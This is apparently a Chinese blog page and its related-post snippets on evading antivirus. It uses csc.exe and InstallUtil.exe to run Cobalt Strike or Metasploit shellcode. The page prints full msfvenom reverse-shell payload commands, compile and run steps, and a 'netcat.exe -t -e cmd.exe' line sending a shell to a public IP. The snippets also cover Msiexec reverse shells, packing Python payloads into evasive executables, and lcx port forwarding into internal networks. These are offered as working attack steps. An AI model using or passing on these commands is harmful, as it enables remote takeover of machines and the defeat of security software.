payload免杀之Installutil.exe&csc.exe利用

0x00 前言

C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。

0x01 利用过程

1.下载shellcode.cs

wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-cs

我这里使用cobalt strike的shellcode,你也可以使用msf的shellcode,命令如下:

msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

2.编译并执行

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

或者 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

绕过的流程图

但是现实很骨感。已经被某60杀了。

原文地址:https://www.cnblogs.com/whoami101/p/11612401.html

时间: 2024-10-31 14:59:40

payload免杀之Installutil.exe&csc.exe利用的相关文章

基于白名单的免杀后门(1)

通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行 利用Msiexec进程反弹 Msiexec是Windows Installer的一部分.用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大.并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便. 原文地址:https

Metasploit+python生成免杀exe过360杀毒

Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py 2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变) from ctypes

lcx.exe内网转发命令教程 + LCX免杀下载

作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 127.0.0.1:3333 今天刚刚第一次使用,特此共享! 另外提供我的免杀lcx.exe 提供给大家下载. 下载是:http://www.xi

分享一个免杀的netcat.exe

GitHub链接:https://github.com/7hmA3s/netcat 免杀情况: 360杀毒/5.0.0.8160   -- 静态扫描和动态执行均免杀 赛门铁克/14.0.3752   -- 静态扫描和动态执行均免杀 反弹shell步骤: 第1步: 外网服务器执行: netcat -l -p 443 第2步: 内网服务器执行: netcat.exe -t -e cmd.exe 136.79.5.226 443 原文地址:https://www.cnblogs.com/dgjnszf

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe.lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell. 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀. 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 第1步:安装Python2.7和Py2exe 一定要安装32位的Python 2.7和32位的P

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

csc.exe已退出,代码为-532462766

我的surface pro4爆屏了 打电话给微软客服,那边说3,4天内给我回复 只能转移源码等资料到老电脑上,老电脑是神舟 精盾K480N I7D2,装的是WIN10预览版build 1625.rs2_release.170721-2122 从微软官网上下载VS2017和MSSQL2016安装了, 附加上转移过来的源码项目,很多项目都运行成功,但是偏偏就有一个项目是在编译的时候报错:“csc.exe已退出,代码为-532462766” 上网搜索了好久,也FQ上GOOGLE搜索了,有清空解决方案重

《CLR Via C#》使用CSC.exe进行单文件的编译

1.新建一个Program.cs文件,并写入代码 在目录E:\LiuSen\VS\test下,新建一个Program.cs文件,输入以下代码 using System; namespace MyConsoleApp {     class Program     {         static void Main(string[] args)         {             Console.WriteLine("Hello world!");             Co

《CRL Via C#》使用CSC.exe对两个文件进行编译

1.新建一个Calculator.cs文件 代码如下 using System; namespace MyClassLib {     public class Calculator     {         public int Add(int a, int b)         {             return a + b;         }         public int Sub(int a, int b)         {             return a -